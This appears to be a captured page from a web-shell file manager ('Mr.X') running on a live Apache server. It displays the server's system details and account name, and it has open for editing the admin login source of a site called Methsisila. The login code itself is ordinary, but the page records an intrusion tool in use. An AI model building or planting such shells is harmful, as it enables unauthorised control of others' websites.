🤩 File Manager - Mr.X
PHP:
8.3.33
Server:
Apache
OS:
Linux 5.14.0-611.49.1.el9_7.x86_64
User:
websparkit
Navigate
Upload:
Upload
New File
New Folder
Editing:login.php
<?php session_start(); require_once '../config/db.php'; if (isset($_SESSION['admin_id'])) { header("Location: index.php"); exit(); } $error = ""; if ($_SERVER['REQUEST_METHOD'] == 'POST') { $username = sanitize($conn, $_POST['username']); $password = $_POST['password']; $stmt = $conn->prepare("SELECT id, password FROM admins WHERE username = ?"); $stmt->bind_param("s", $username); $stmt->execute(); $result = $stmt->get_result(); if ($result->num_rows > 0) { $admin = $result->fetch_assoc(); if (password_verify($password, $admin['password'])) { $_SESSION['admin_id'] = $admin['id']; $_SESSION['admin_user'] = $username; header("Location: index.php"); exit(); } else { $error = "Invalid password."; } } else { $error = "Admin not found."; } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Admin Login | Methsisila</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"> <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;600;700&display=swap" rel="stylesheet"> <style> body { font-family: 'Inter', sans-serif; background: #f8f9fa; height: 100vh; display: flex; align-items: center; justify-content: center; margin: 0; } .login-card { background: #fff; padding: 40px; border-radius: 20px; box-shadow: 0 15px 40px rgba(0,0,0,0.1); width: 100%; max-width: 400px; } .login-logo { text-align: center; margin-bottom: 30px; } .login-logo img { max-height: 80px; } .form-control { border-radius: 10px; padding: 12px 15px; background: #f1f3f5; border: none; margin-bottom: 20px; } .form-control:focus { background: #e9ecef; box-shadow: none; } .btn-login { background: #ff6900; color: #fff; border: none; padding: 12px; border-radius: 10px; width: 100%; font-weight: 700; transition: 0.3s; } .btn-login:hover { background: #e65c00; transform: translateY(-2px); } </style> </head> <body> <div class="login-card"> <div class="login-logo"> <img src="../assets/img/logo.png" alt="Methsisila" onerror="this.src='https://images.pexels.com/photos/2108845/pexels-photo-2108845.jpeg?auto=compress&cs=tinysrgb&w=600';"> <h4 class="mt-3 fw-bold">Admin Portal</h4> <p class="text-muted small">Please sign in to continue</p> </div> <?php if($error): ?> <div class="alert alert-danger small py-2"><?= $error ?></div> <?php endif; ?> <form method="POST"> <div class="mb-3"> <label class="small fw-bold text-muted mb-1">Username</label> <input type="text" name="username" class="form-control" placeholder="Enter username" required> </div> <div class="mb-4"> <label class="small fw-bold text-muted mb-1">Password</label> <input type="password" name="password" class="form-control" placeholder="Enter password" required> </div> <button type="submit" class="btn btn-login">SIGN IN</button> </form> <div class="text-center mt-4"> <a href="../index.php" class="text-decoration-none text-muted small"><i class="fas fa-arrow-left me-1"></i> Back to Home</a> </div> </div> </body> </html>
Save Changes
Cancel
Create New File
Create New Folder